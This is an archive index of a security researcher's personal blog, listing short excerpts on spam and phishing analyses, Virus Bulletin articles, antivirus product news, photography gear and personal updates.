professor in the P.U.B. , i started the PDA and enabled the wireless connection. surprisingly, three wifi nets were available. two were secured, one not. i connected to it and ... surprise... i am online :) and i am writing this message from the pda, sitting on the stairs ... - [DE.MSN.COM wrote about the German Phishing and Malware statistics](https://www.sorinmustaca.com/de-msn-com-wrote-about-the-german-phishing-and-malware-statistics/) - I decided to write this as a separate post because I find it really nice: Tech.DE.MSN.COM wrote: http://tech.de.msn.com/sicherheit/news_artikel.aspx?cp-documentID=147625442 - [First time in a German news](https://www.sorinmustaca.com/first-time-in-a-german-news/) - After writing the article in the Avira Techblog, Dirk Knopp, Avira's Technical Editor, showed me the link below: http://www.channelpartner.de/knowledgecenter/security/277691/index.html There is an omission, I hope not intentional: I wrote in the blog: Our statistics show that 14.43% from the Phishing and 15.04% from the Malware URLs (for which we have geo IP information) The article - [Softpedia quoted me again](https://www.sorinmustaca.com/softpedia-cited-me-again/) - The original article on Avira's Techblog: http://techblog.avira.com/2009/05/25/malware-and-phishing-statistics-for-germany/en/ And the article on Softpedia: http://news.softpedia.com/news/Germany-Is-A-Significant-Source-of-Malicious-URLs-112566.shtml I am starting to like this :) - [Confiker gots itself a page](https://www.sorinmustaca.com/confiker-gots-itself-a-page/) - Everybody is trying to find a way to get rid of it. And it works. Here is a page with a bunch of tools and HowTOs which remove Conficker. http://www.h-online.com/security/The-H-Security-Conficker-information-site--/features/113002 - [Softpedia quoted my post in the Avira Techblog](https://www.sorinmustaca.com/softpedia-quoted-my-post-in-the-avira-techblog/) - Here is the original post: http://msorin.wordpress.com/2009/03/25/colorful-spam-twist-for-bypassing-spamfilters Here is the Softpedia article: http://news.softpedia.com/news/HTML-Design-Tricks-Used-to-Hide-Spam-107861.shtml - [How Spaces.Live.com encourages spamming](https://www.sorinmustaca.com/how-spaceslivecom-encourages-spamming/) - We analyzed the spam presented in the post called Colorful Spam twist for bypassing Spamfilters and ended the post with the information that the target page is hosted on the spaces.live.com. Of course, as we always do in such cases, we wanted to report several URLs to the Abuse team at live.com. We searched on - [Bug or feature: Mime Type Detection](https://www.sorinmustaca.com/bug-or-feature-mime-type-detection/) - Also known as MIME Sniffing, this is a feature or bug in IE which is the only browser able to dynamically determine the content type of the document it loads. So, in this case, it detects a plain text document with HTML content instead of a an JPG header. And the content of the "JPG" - [Avira sets up first Asian unit in Malaysia](https://www.sorinmustaca.com/avira-sets-up-first-asian-unit-in-malaysia/) - Avira sets up first Asian unit in Malaysia: More infos here: http://www.btimes.com.my/Current_News/BTIMES/articles/20090325000558/Article - [Colorful Spam twist for bypassing Spamfilters](https://www.sorinmustaca.com/colorful-spam-twist-for-bypassing-spamfilters/) - A new technique to avoid spam filters: http://techblog.avira.com/2009/03/25/colorful-spam-twist-for-bypassing-spamfilters/en/ The technique will be added here as well: http://www.virusbtn.com/resources/spammerscompendium/colormatrix.xml - [A Field Guide to Genetic Programming](https://www.sorinmustaca.com/a-field-guide-to-genetic-programming/) - From : http://www.lulu.com/content/2167025 Description: Genetic programming (GP) is a systematic, domain-independent method for getting computers to solve problems automatically starting from a high-level statement of what needs to be done. Using ideas from natural evolution, GP starts from an ooze of random computer programs, and progressively refines them through processes of mutation and sexual recombination, - [Spam using Google's Spreadsheets](https://www.sorinmustaca.com/spam-using-googles-spreadsheets/) - It was Google Docs, Google Notes and now Google Spreadsheets: Interesting to notice is also the fact that the email was sent from a Google Mail Account *ONLY* to other Google Mail accounts. And, the famous Google Antispam didn't mark it as SPAM: - [A Library Of Digital Photography](https://www.sorinmustaca.com/a-library-of-digital-photography/) - Reading this article, made think that I need such a list as well. I have create long time ago the same list, but so up2date and complete. So, here they are: Magazines Digital Photo Outdoor Photographer Popular Photography Shutterbug Image Sharing Flickr Kodak Snapfish Photography Books Camera Books Camera Reviews Dcviews Digital Photography Review Steve's - [Police in Romania detain 20 alleged hackers](https://www.sorinmustaca.com/police-in-romania-detain-20-alleged-hackers/) - Good News: http://www.msnbc.msn.com/id/29633353/ TIMISOARA, Romania - Police in Romania on Wednesday detained 20 people suspected of cloning the Web sites of banks in other countries to deplete customers' bank accounts. So, this IS possible ! Keep up the good work guys ! Click here to see Timisoara on the map. - [Google Maps is cool](https://www.sorinmustaca.com/google-maps-is-cool/) - I was searching recently some location on Google Maps and I accidentally found .. a plane :) Google's satellite took the picture from the orbit and photographed the plane in flight over that region. Nothing special, just pure accident ;) See the picture below: - [Finally... VOIP on the PDA with WinMobile 6.1](https://www.sorinmustaca.com/finally-voip-on-the-pda-with-winmobile-61/) - After a long search, many trials, many installations,uninstallations and unnecessary reboots,I found the program which actually works on WM 6.1: Express Talk VoIP Softphone Here is the website: http://www.nch.com.au/talk/ (written on my HTC Touch HD) - [What to do if your site has been hacked by Phishers](https://www.sorinmustaca.com/what-to-do-if-your-site-has-been-hacked-by-phishers/) - APWG has published an advisory document called "What to do if your site has been hacked by Phishers". This document gives website owners specific actions they can take when they have been notified that their website or webserver has been infiltrated and used for Phishing. Going forward, if you are a brand owner, takedown provider, - [Avira Techblog is online](https://www.sorinmustaca.com/avira-techblog-is-online/) - At the beginning of this year Avira opened to the public the Technical blog: http://techblog.avira.com We publish there news which are too technical to be displayed on the www.avira.com page. I publish quite a lot things about Spam and Phishing. Have a look at it: http://techblog.avira.com There is also RSS Feed support: http://techblog.avira.com/feed/en/ - [C++ evolved](https://www.sorinmustaca.com/c-evolved/) - C++ got since last update new functionalities: Regular expressions library Atomic operations library Thread support library Smart pointers Read more here: http://open-std.org/JTC1/SC22/WG21/docs/papers/2008/n2798.pdf These things are also added in Boost and in TR1 implementation for Visual Studio 2008. Read the Draft Technical Report on C++ Library Extensions available here: http://open-std.org/JTC1/SC22/WG21/docs/papers/2005/n1836.pdf - [32-bit and 64-bit Application Interoperability - Windows (part 1)](https://www.sorinmustaca.com/32-bit-and-64-bit-application-interoperability-windows-part-1/) - I needed a solution for making an application which is native 32b to "discuss" with a 64b client. The client is creating a shared memory in which some data is saved. The server needs to process the data. Amazon: Bestsellers Electronics and Photo Here is how MSDN describes the problem: Running 32-bit Applications (on 64-bit - [Stupid spammers](https://www.sorinmustaca.com/stupid-spammers/) - Don't you just hate them ?! I do... They are just wasting my CPU power and bandwidth to detect such stupid evasion techniques. I mean... look at the picture below: Why the hack would I send to myself a picture with all kind of meds and then, write at the end some text from a - [Nigerian scam with MS Word Document attached](https://www.sorinmustaca.com/nigerian-scam-with-ms-word-document-attached/) - There is a new type of Nigerian scam (aka 419 scam) where the body of the email looks like the one in the screen shot below and the real content is in the attached MS Word document. Here is the content of the Word document: Why this ? Because it is very hard to detect - [A new type of Nigerian scam ?](https://www.sorinmustaca.com/a-new-type-of-nigerian-scam/) - Usually we are used to see long emails when we talk about Nigerian Scams. But, this one is one line long. See the image. - [Google launches an open-source web browser called Chrome](https://www.sorinmustaca.com/google-launches-an-open-source-web-browser-called-chrome/) - More infos here: http://googleblog.blogspot.com/2008/09/fresh-take-on-browser.html and here www.google.com/chrome which doesn't yet works. They plan to release today. - [Vote my photo on JPGMagazine.com](https://www.sorinmustaca.com/vote-my-photo-on-jpgmagazinecom/) - [MSN Messenger Stock Spam](https://www.sorinmustaca.com/msn-messenger-stock-spam/) - Here is the first messenger Stock spam 06.08.2008 12:14:45 Graciela: aipepwabemHot Stock Alert Global Agri-Med Technologies Inc. Symbol - GAGO This New and Undervalued bio tech IPO has huge potential with their new product BreastAlert Read their latest PR and get in on GAGO It's an easy doubler from this point - [Google is ... sorry ?](https://www.sorinmustaca.com/google-is-sorry/) - I am using the Google lite extension for Firefox 3. I typed there "futex" (Fast User space muTEX) and I received this URL: http://sorry.google.com/sorry/?continue=http://www.google.com/search%3Fq%3Dfutex%26ie%3DUTF-8 and this page: It is really interesting what those links show: virus checker http://www.download.com/Antivirus/3150-2239-0.html spyware remover http://www.download.com/sort/3150-8022-0-1-4.html - [Firefox 3 - World Record Day](https://www.sorinmustaca.com/firefox-3-world-record-day/) - So, if you're reading this then go and download : http://www.spreadfirefox.com/en-US/worldrecord/ - [Safari vs. Firefox 2.x](https://www.sorinmustaca.com/safari-vs-firefox-2x/) - I recently installed Safari and immediately liked it. It looks cool, much cooler than Firefox. But, how friendly is it ? Well, too friendly... as in... too dumb :( Just a very simple example where to save a file. And there are many others. Unfortunately, I had to stop using it. It just doesn't offer - [It is official: I have a Photoblog](https://www.sorinmustaca.com/it-is-official-i-have-a-photoblog/) - After seeing this post in the main page of Wordpress I decided to make a Photoblog. I am not yet sure what will I publish there, but... it is done ! Here is the link and you can also find it in the Link section on the right side. - [New article in Virus Bulletin: Delivering reliable protection against phishing websites](https://www.sorinmustaca.com/new-article-in-virus-bulletin-delivering-reliable-protection-against-phishing-websites/) - I did it again : I've written a new article for VB :) Note that you need an account in order to read it. Delivering reliable protection against phishing websites - [The Spammers' Compendium moved to Virus Bulletin's website](https://www.sorinmustaca.com/the-spammers-compendium-moved-to-virus-bulletins-website/) - As of May 1st 2008, the Spammers' Compendium found a new home. It has been moved from www.jgc.org/tsc to www.virusbtn.com/tsc I and Nick Fitzgerald will continue to look for new tricks and maintain this collection. John posted this info also on his blog here Anyone can submit new techniques by sending an email to tsc - [New article in Virus Bulletin Magazine](https://www.sorinmustaca.com/new-article-in-virus-bulletin-magazine/) - I wrote a new article for Virus Bulletin Magazine called Delivering reliable protection against phishing websites (requires registration) - [What's wrong with Facebook ?](https://www.sorinmustaca.com/whats-wrong-with-facebook/) - Is there something wrong going on with Facebook at the time I publish this post? The website behaves abnormally slow and I had to click 2-3 time on some buttons until the changes were applied. If somebody received from me 2 (or more) invitations to connect, sorry... it is from this strange effect. Initially I - [No spam, please !](https://www.sorinmustaca.com/no-spam-please/) - Have a look at this picture taken today. I live there and those are the post boxes of all the inhabitants of that building. My box is in the middle (see the notes). That sticker does the job :) I never received a commercial ... NEVER !!! Can you believe this ? My neighbor has - [Why is it worth fighting against SPAM ?](https://www.sorinmustaca.com/why-is-it-worth-fighting-against-spam/) - I received a post from my friend John Graham-Cumming (www.jgc.org) where he announced that he retires from the antispam industry. I even asked him if this is a joke. No, it is not. John, I am sorry to see you leave, I wish you good luck in your future activity, whatever that might be. Now, - [Why no antivirus for P2P programs ?](https://www.sorinmustaca.com/why-no-antivirus-for-p2p-programs/) - I received a nice email with a very good question from Mehdy Mohajery. It is not the first time I am asked the same question. This time I am documenting the answer I always give. Question: I saw you profile on linkedin.com just tonight , and I noticed that you are specialist in both p2p - [Flickr river](https://www.sorinmustaca.com/flickr-river/) - [Kartenhaus.de hacked - thousand of credit cards stolen](https://www.sorinmustaca.com/kartenhausde-hacked-thousand-of-credit-cards-stolen/) - It happened in October... most probably. I received on October 4th 2007, a very long email from this company which sells concert tickets. I bought tickets for a Manowar concert in Munich. And paid with my credit card. I received the email below (in German) which announces me that their servers were hacked and they - [Spammed by... GFI Software?](https://www.sorinmustaca.com/spammed-by-gfi-software/) - I received this email from a guy from GFI who contacted me on the email address published on the website. Interesting mode to make publicity. Practically, they want me to spread the word about their company. Cheap marketing, nothing to say. :) Now, how can we differentiate between a spam and such a message ? - [Why no posts lately ...](https://www.sorinmustaca.com/why-no-posts-lately/) - If you wondered why, the reason is very simple :) I have a new born son ! His name is Robert and was born on 17th September 2007. Here is a picture of him: - [2007 Desktop Linux Market survey](https://www.sorinmustaca.com/2007-desktop-linux-market-survey/) - Source: http://www.desktoplinux.com/cgi-bin/survey/survey.cgi?view=archive&id=0813200712407 Distributions: Desktop environments Running Windows applications on Linux Email clients Browsers - [The most comprehensive collection of 4/3 Lenses](https://www.sorinmustaca.com/the-most-comprehensive-collection-of-43-lenses/) - www.4-3system.com With lenses from all producers : Olympus (Zuiko), Sigma, Leica. Total: 34 pieces. Impresive :) My favorite: Zuiko Digital 11-22mm f2.8-3.5 It is very expensive and I don't have it yet. :( - [Aminus3](https://www.sorinmustaca.com/aminus3/) - I read in PhotoPraxis about a cool site called Aminu3.com. This is a photoblog. You are allowed to upload there an unlimited number of pictures ! You get your own website: http://sorinmustaca.aminus3.com - [Stock spam reloaded: XLS format this time](https://www.sorinmustaca.com/stock-spam-reloaded-xls-format-this-time/) - Remember the stock spams send in PDF format ? You thought they are new ? Think again ! Now it is time for Excel format ! The mails come in a ~24Kb XLS file called "detailed invoice.xls", "stock information.xls", "investor_news2323.xls" and probably many others. See the picture below for a screen shot. What is interesting - [Minimo - browser for PDA (WM 2005)](https://www.sorinmustaca.com/minimo-browser-for-pda-wm-2005/) - I just installed and tested Minimo. Minimo is "a small, simple, powerful, innovative, web browser for mobile devices", created by Mozilla.org. Minimo uses Mozilla Technologies to produce a highly usable web browser for advanced mobile devices. Features include: * Fast access to your mobile content via Homebase start page * Best support for modern web - [New face and look](https://www.sorinmustaca.com/new-face-and-look/) - My website got a new face :) I was tired of the old black-yellow combination and I changed it to the one you see ;) - [Spam description with my name in it](https://www.sorinmustaca.com/spam-description-with-my-name-in-it/) - John Graham Cumming is maintaining his Spammer's Compendium and he is giving names to spam techniques. I reported some time ago one technique used in PayPal phishing emails and he created a method: Cross your fingers and click (UH!Mustaca!HTML) What: Making what looks like a valid link to PayPal turn into a link to a - [Articles on Virus Bulletin's website: Advanced fee fraud or phishing?](https://www.sorinmustaca.com/articles-on-virus-bulletins-website-advanced-fee-fraud-or-phishing/) - http://www.virusbtn.com/resources/phishing/419-or-phish.xml - [Articles on Virus Bulletin's website: PDF Stock Spam](https://www.sorinmustaca.com/articles-on-virus-bulletins-website-pdf-stock-spam/) - http://www.virusbtn.com/resources/phishing/stock-spam-pdf.xml - [New type of Stock Spam : PDF Stock Spam](https://www.sorinmustaca.com/new-type-of-stock-spam-pdf-stock-spam/) - Last evening I analyzed a new type of spam, together with Oliver Auerbach. It has been published immediately on the avira.com website, thanks to Oliver. Source: http://www.avira.com/en/security_news/new_type_of_stock_spam.html Content: Tettnang, Wed, 20 June 2007 - Avira warns about a new type of spam which is currently sent to users within Germany. The spam claims to be - [Vote my photo on JPG Magazine - Dreamscapes](https://www.sorinmustaca.com/vote-my-photo-on-jpg-magazine-dreamscapes/) - Click here in order to vote it (you need an account on jpgmag.com) - [Vote my photo on JPG Magazine #2](https://www.sorinmustaca.com/vote-my-photo-on-jpg-magazine-2-2/) - Click here in order to vote it (you need an account on jpgmag.com) - [Vote my photo on JPG Magazine #1](https://www.sorinmustaca.com/vote-my-photo-on-jpg-magazine-2/) - The sky is burning Click here in order to vote it (you need an account on jpgmag.com) - [Webcasts from EU Spam Symposium](https://www.sorinmustaca.com/webcasts-from-eu-spam-symposium/) - The organizers of the symposium filmed and published all the talks on Google's YouTube. Who wants to see what happened there, can access the presentations from here: http://www.spamsymposium.eu/archivewebcast.htm - [Un nou atac phishing asupra clientilor Raiffeisen](https://www.sorinmustaca.com/un-nou-atac-phishing-asupra-clientilor-raiffeisen/) - So, a new attack against Raiffeisen clients in Romania. I made the analysis. Here is the link: http://www.avira.ro/ro/stiri_securitate/un_nou_atac_phishing_asupra_clientilor_raiffeisen.html - [Older articles on Virus Bulletin's website](https://www.sorinmustaca.com/older-articles-on-virus-bulletins-website/) - The links below are located on this site section : http://www.virusbtn.com/resources/phishing/index As can be seen, until the moment of writing this post, I am the only author. Click on the links below to be redirected on the Virus Bulletin's website. You need to register to read the articles. Don't worry, is free of charge. Do - [New article on Virusbtn.com: The return of the animated spam](https://www.sorinmustaca.com/new-article-on-virusbtncom-the-return-of-the-animated-spam/) - Click here to be redirected on the Virus Bulletin's website. You need to register to read the articles. Don't worry, is free of charge. http://www.virusbtn.com/resources/phishing/animated-spam.xml - [Camera Review : Casio Exilim EX-Z1050](https://www.sorinmustaca.com/casio-exilim-ex-z1050/) - Almost like everyone here, I got it for my wife with the hopes that it is easy to use, makes decent photos in AUTO mode, has low noise levels and long life battery. Partially, it fulfills my expectations. I didn’t have time to play with it a lot because I really don’t like this kind - [New Olympus camera and lens - P1](https://www.sorinmustaca.com/new-olympus-camera-and-lens-p1/) - These pictures are taken from dpreview.com Pictures of the P1 The new lens ED 12-60mm ED 14-35mm ED 50-200mm ED 70-300 - [German SMS spam or phishing or Nigerian scam ?](https://www.sorinmustaca.com/german-sms-spam-or-phishing-or-nigerian-scam/) - I am trying to sell my car and I posted it on Autoscout24.de. 90% of the telephone calls I received were from handlers, all of them not germans. About half were turks and the rest maybe russians and chechs/slovacs. However, I received also 2 emails and two SMS messages. The emails were in English and - [Olympus is not dead, not even sleeping](https://www.sorinmustaca.com/olympus-is-not-dead-not-even-sleeping/) - I am a big fan of Olympus' digital cameras. I own a C 750 UZ and the SLR E-500 together with its "accessories" Zuiko Digital lenses 14-45mm, 40-150mm, 18-180mm and the FL36 Olympus flash. I heard rumours that Olympus is not fighting anymore on the photography market. Nothing can be so far away from the - [Flickr is having a massage](https://www.sorinmustaca.com/flickr-is-having-a-massage/) - Which means ... it is offline. Maybe it has to do with the post on February 19 where the caching servers went down ... I don't know.... We'll see and I'll post results here. - [Manowar releases a new album: Gods of War](https://www.sorinmustaca.com/manowar-releases-a-new-album-gods-of-war/) - Yes, I can't help it... :) I had to write here about this ! Manowar will release a brand new album called Gods of War Tracklist GODS OF WAR: 1. OVERTURE TO THE HYMN OF THE IMMORTAL WARRIORS 2. THE ASCENSION 3. KING OF KINGS 4. ARMY OF THE DEAD, PART I 5. SLEIPNIR 6. - [Vote my photo #2 on WOW](https://www.sorinmustaca.com/vote-my-photo-2-on-wow/) - Vote my photo on WOW: - [Vote my photo #1 on WOW](https://www.sorinmustaca.com/vote-my-photo-on-wow/) - Vote my photo on WOW or just see it here, on Flickr: - [The quest of cross compiling](https://www.sorinmustaca.com/the-quest-of-cross-compiling/) - I own a Dreambox 500S which is in fact a box with a 250 Mhz PPC processor. It runs, of course, Linux, kernel 2.6.9. Because it is so small, so power efficient, I plan to use it to make some cron jobs ;) So, here I start with some links: http://penguinppc.org/embedded/#toolchain http://kegel.com/crosstool/ http://kegel.com/crosstool/crosstool-0.43/doc/crosstool-howto.html I'll post - [Vote my photo on JPG Magazine](https://www.sorinmustaca.com/vote-my-photo-on-jpg-magazine/) - Here is my submition to JPG Magazine: http://www.jpgmag.com/photos/46802 - [Interview in theinvestormagazine.com](https://www.sorinmustaca.com/interview-in-theinvestormagazinecom/) - Ana Maria Gavrila from The Investor contacted Avira Romania because she needed some expert opinions about the software market's future in Romania. And I answered. The "interview" (with quotes because I never discussed with her) is in the Romanian language and was not yet published online. I have the scanned pages with the interview here. - [My book collection on LibraryThing.com](https://www.sorinmustaca.com/my-book-collection-on-librarythingcom/) - I was trying to update my Book Collection ... manually. I wanted to optimize this thing .. .so I found a nice site where you can load your books and have some code integrated in the site. So, here is the Book new Book I have read collection. - [Old blog imported into Wordpress](https://www.sorinmustaca.com/old-blog-imported-into-wordpress/) - Hurrrrayyyyyy.... because 1111mb.com is again alive, I managed to import everything here. Here is how : 1. Install on your hosted Wordpress.org blog the plugin http://www.technosailor.com/wordpress-to-wordpress-import/ 2. Export everything locally 3. Import into wordpress.com (Manager->Import->Wordpress WXR) Done ! - [Old Blog still online](https://www.sorinmustaca.com/old-blog-still-online/) - My old blog before moving to 1111mb.com is still online. Click here to visit it - [My blog is gone ...](https://www.sorinmustaca.com/my-blog-is-gone/) - The provider who was hosting my blog has just dissappeared from the Internet. It was called 1111mb.com and now the domain is available for re-registration. Shit, I wanted to pay them to host my blog in a professional way. Now, I am trying to find something alternative. I will import the old posts (I have - [Super optimized search](https://www.sorinmustaca.com/super-optimized-search/) - While I was looking on various sites for some Christmas presents, I performed some searches :) On some of the sites I found what I was looking for, on some ... well .. .not :) The funny part is that I searched for something and got back something that had absolutely nothing to do with - [Manowar just released a new DVD and a new album](https://www.sorinmustaca.com/manowar-just-released-a-new-dvd-and-a-new-album/) - Click here for more details about the album "The Sons of Odin and the DVD "The Absolute Power" - [ASCII Art Spam](https://www.sorinmustaca.com/ascii-art-spam/) - Long time since I saw one of these ;) - [Conceptronic CHD3LAN NAS Server](https://www.sorinmustaca.com/conceptronic-chd3lan-nas-server/) - I bought from eBay a brand new Networked Attached Storage server without HDD for 51 euro. Cheap and nice toy.. but ... The company from which I bought it, advised me to upgrade the firmware via the web interface. And I did, poor me :( Needless to say that the box is dead now. During - [Wordpress 2.0.5 up & running](https://www.sorinmustaca.com/wordpress-205-up-running/) - I've just upgraded to Wordpress 2.0.5 and the system is up & running. Good job guys ! - [I’ve made an website](https://www.sorinmustaca.com/ive-made-an-website/) - No, I didn't change my job :) I just helped some friends who own an italian delicatessen shop to make a presentation of the shop. The site is here http://www.feinkost-messina.de. I made all the photos with my Olympus E-500 and the 14-45mm lens. There is also a slideshow made with Microsoft's XP Powertoys. - [Avira Premium Security Suite is released](https://www.sorinmustaca.com/avira-premium-security-suite-is-released/) - So, finally, after a lot of hard work, the product has seen the release day :) Here it is: http://www.avira.com/en/products/avira_premium_security_suite.html - [Half phishing, half true](https://www.sorinmustaca.com/half-phishing-half-true/) - I just found a new phishing which opens a new chapter in the Paypal Phishing history. The phishing advertises a laptop which really exists on eBay com , informs the user that he has to pay it and allows the user to cancel the transaction. Obviously, the link with Cancel Transaction is faked. Click on - [Avira Premium with integrated firewall -> Avira Premium Security Suite](https://www.sorinmustaca.com/avira-premium-with-integrated-firewall-avira-premium-security-suite/) - Yes, we changed its name :) Starting with a strange name for a security product, Avira Premium with integrated firewall, now it is called "Avira Premium Security Suite". Ole ! And it looks good so far. Looking forward for the release, which btw, is *very* soon. - [Animated IMG spam](https://www.sorinmustaca.com/animated-img-spam/) - This is a Stock Spam with frames ;) Here are the frames: Frame 0 Frame 1 Frame 2 Frame 3 Frame 4 - [More Skype exposed](https://www.sorinmustaca.com/more-skype-exposed/) - I found recently a very interesting article about P2P networks and Skype. This comes as a completion of the other article about Skype exposed posted here in June: Here is a permalink It is written by some guys from Cornell and Google. Here is the article. The most interesting thing is (copied included links): "Garfinkel - [To IEEE or not to IEEE, that’s the question](https://www.sorinmustaca.com/to-ieee-or-not-to-ieee-thats-the-question/) - Yes, that's the question: To continue being an IEEE member or not ? Of course, if I say YES, I have to pay about 140 euro.(+ Computer Security & Privacy which is an extra service) If I say NO, I don't, but I will not receive anymore the IEEE Spectrum Computer Security & Privacy So, - [Blogging from FLOCK](https://www.sorinmustaca.com/blogging-from-flock/) - Flock is a very nice web browser that supports: - blogging - flickering and many others things which I didn't yet discover. It is small and much faster then Mozilla based browser. This is the website: www.flock.com Note: Flock is based on Firefox 1.5.0.7 Blogged with Flock - [DB problems fixed](https://www.sorinmustaca.com/db-problems-fixed/) - My provider, 1111mb.com, which holds the blog, made an upgrade to the latest MySQL. This killed almost all sites which use PHP+MySQL for a couple of hours :) Now seems to work, but slow as hell ... - [Registration finally fixed](https://www.sorinmustaca.com/registration-finally-fixed/) - Thanks to a benevolent user, timops96, I found and fixed an issue in Wordpress' registration function. It was using the mail() function of PHP which any decent webserver(+PHP) will deactivate it. I replaced it with smtpmail and did some additional tricks and now it seems to work. Have fun registering ! - [Flickr rulez](https://www.sorinmustaca.com/flickr-rulez/) - Lately, I have become another Flickr addicted. This happen before becoming a Pro. Pro is a paid account and I received it as a present for by birthday, from Mihaela (my wife). Each time I open my browser, my mouse goes automatically here: Comments On your Photos If I see comments, and I usually do, - [Romania from an English perspective](https://www.sorinmustaca.com/romania-from-an-english-perspective/) - Just read these articles: Where draughts are truly dangerous By Debbie Stowe http://www.telegraph.co.uk/global/main.jhtml?xml=/global/2005/08/16/exroman.xml Logic problems that test your patience in Romania By Debbie Stowe http://www.telegraph.co.uk/global/main.jhtml;jsessionid=2ICNE2BHCD5RHQFIQMFCFFOAVCBQYIV0?xml=/global/2005/05/17/romex.xml I'll comment later on them :) - [Bringing down phishers](https://www.sorinmustaca.com/bringing-down-phishers/) - I wrote in the morning to this institution the message below. "Hi, Your website hosts a phishing site for Wachovia Bank. Please remove this path on your webserver: http://pastandfutureofmoney.nl/login/ssPageName=hhpayUSf&=user.... " Thank you. We will contact you as soon as possible. G. C. Nieuwland, PHvL And now the answer: Thank you for reporting this! We were - [Where have I been …](https://www.sorinmustaca.com/where-have-i-been/) - create your own visited countries map - [Pictures with my new Zuiko Lens …](https://www.sorinmustaca.com/pictures-with-my-new-zuiko-lens/) - ... can be seen here: http://flickr.com/photos/msorin - [My new Zuiko 18-180 Lens](https://www.sorinmustaca.com/my-new-zuiko-18-180-lens/) - The image below is taken from www.olympus-europa.com The other images are made by myself. - [MICO and VSTUDIO 2005](https://www.sorinmustaca.com/mico-and-vstudio-2005/) - Or better to say ... MICO against VSTUDIO 2005. We have so many headaches with this new compiler. Our code keeps crashing ... the same code that used to work. I will have to install this VS to test it myself... beah ... :( Now I am working on the VCPROJ files for VS2003. - [Paypal phishing w/o hosted HTML files](https://www.sorinmustaca.com/paypal-phishing-wo-hosted-html-files/) - It is the first time I can see a phishing that doesn't have a website to store the website ! This email came as a self sustained phishing solution. It is written in HTML and JS and it has a FORM whos action is POST to a website which saves the data. The submit button - [Avira Antivir with Firewall](https://www.sorinmustaca.com/avira-antivir-with-firewall/) - I started last week to moderate the Forums of the Antivir beta products. Antivir 7 with integrated Firewall is in beta and is doing very good. A lot of positive feedback ... Check here: http://betatest.avira.com/beta/index.php?lang=en to register for free and be able to test the products. - [Updating Wordpress](https://www.sorinmustaca.com/updating-wordpress/) - I updated Wordpress from 2.0.3 to 2.0.4... Worked without any problems even though I didn't respect what was written in the guide. - [Enhanced site](https://www.sorinmustaca.com/enhanced-site/) - I added some features from Feedburner.com to make everything more dynamic. Also, check the EXTRA Page where I reorganized some older experiments of mine. - [Bye, bye, Blogger!](https://www.sorinmustaca.com/bye-bye-blogger/) - Finally I decided to remove all the old posts from the blog hosted Blogger and link them to this one. However, I had a problem ... Until January 2006, I had all the files hosted by Blogger and from January, I moved them to this blog. Then, in a futile attempt to retrieve the old - [PayPal phish better and better](https://www.sorinmustaca.com/paypal-phish-better-and-better/) - [Atac de tip phishing impotriva clientilor BCR si ai altor banci](https://www.sorinmustaca.com/atac-de-tip-phishing-impotriva-clientilor-bcr-si-ai-altor-banci/) - Here it starts again ... Wall-Street.ro website - [Double Phishing: PayPal & eBay](https://www.sorinmustaca.com/double-phishing-paypal-ebay/) - Subject:PayPal & eBay From:"PayPal" Date:Thu, 6 Jul 2006 04:36:34 -0700 To:undisclosed-recipients:; This e-mail is the notification of PayPal Become One With eBay. We're excited about this change because it allows us to offer you: * Easier access to all your account information* Enhanced Online Bill Payment * Transfer balances online * Mass Payment allows anyone - [Wasted Phishing campaign](https://www.sorinmustaca.com/wasted-phishing-campaign/) - I just received a PayPal Phishing which is pretty nice. Nothing special about it .. this time. The only problem is that they used a wrong link to the fake site: http://1171700305:20/webscr/index.php?update.user. The offending part is the port: 20. Here is what Firefox says: " This address is restricted This address uses a network port - [Writing my review of the EU Spam Symposium](https://www.sorinmustaca.com/writing-my-review-of-the-eu-spam-symposium/) - I have started to write my review of the Symposium. Briefly, it was ok, but as any conference, there were also some negative aspects. If the review will not be published in Virus Bulletin, I will also publish it here. More details later. Until then, have a look at the presentations: http://www.spamsymposium.eu/archivewebcast.htm - [Olympus compatible or 3/4 Lenses](https://www.sorinmustaca.com/olympus-compatible-or-34-lenses/) - While searching on the net for my next acquisition, i found once more the site of Wrotniak. I know it for about 2 years now and I always found it interesting. Now even more ;) Olympus compatible lenses: http://www.wrotniak.net/photo/oly-e/lenses.html - [Added more categories](https://www.sorinmustaca.com/added-more-categories/) - I added more categories. Unfortunately, Wordpress can not move old posts from a category to another. Or I don't know yet how to do this. - [First test using Wordpress](https://www.sorinmustaca.com/first-test-using-wordpress/) - Hi, This is a test using Wordpress. - [EU Spam Symposium](https://www.sorinmustaca.com/eu-spam-symposium/) - I will be attending the EU Spam Symposium which will take place on 15.06.06 in Maastricht. Here is the link to the program: http://www.spamsymposium.eu/program.htm - [Stock spam made of multiple images](https://www.sorinmustaca.com/stock-spam-made-of-multiple-images/) - Recently some of my colleagues received spam mails which were created through a single image. Or, so it seemed ... At a closer look, the image was actually created from multiple images. See the link below: http://www.mustaca.de/security/multiimage.eml This should be an anti OCR technique ?! Maybe ... - [Venezia - Piazza San Marco - Collage](https://www.sorinmustaca.com/venezia-piazza-san-marco-collage/) - collage, originally uploaded by Sorin M.. Made with Picassa2 - [Skype exposed](https://www.sorinmustaca.com/skype-exposed/) - Here is a very interesting analysis of the well known program Skype. http://www.secdev.org/conf/skype_BHEU06.pdf From now on I will think twice before using Skype .. :( - [The World on a smaller scale …](https://www.sorinmustaca.com/the-world-on-a-smaller-scale/) - .flickr-photo { border: solid 1px #000000; }.flickr-frame { float: left; text-align: center; margin-right: 15px; margin-bottom: 15px; }.flickr-caption { font-size: 0.8em; margin-top: 0px; } originally uploaded by Sorin M.. The entire set is available here Check my photos from Flickr to see a couple of very nice small scale reproductions of famous constructions around the World. - [Google goes phishing](https://www.sorinmustaca.com/google-goes-phishing/) - As many others in the software business, Google has made public his plans to hit the market with a Antiphishing Toolbar. A screenshot is available. - [Blog](https://www.sorinmustaca.com/blog/) - This is a nice test created by Google Toolbar's BLOG function. You can even see its picture here Blog - [googletoolbar](https://www.sorinmustaca.com/googletoolbar/) - .flickr-photo { border: solid 1px #000000; }.flickr-frame { float: left; text-align: center; margin-right: 15px; margin-bottom: 15px; }.flickr-caption { font-size: 0.8em; margin-top: 0px; } googletoolbar, originally uploaded by Sorin M.. And now the toolbar blog itself. I just love when all these nice software talk to each other so nicely :) This is the future ! - [Website updated: Amazon Partner](https://www.sorinmustaca.com/website-updated-amazon-partner/) - I updated the website and added a new section Amazon Books. From here, someone could access the www.amazon.de website and buy some products. Also, I added http://www.mustaca.de/html/body_beletristic.html These are my personal recommendations. - [FAR Manager at 1,7 Release](https://www.sorinmustaca.com/far-manager-at-17-release/) - Here you can download FAR Manager Since March 29, 2006, FAR Manager 1.70 is available: 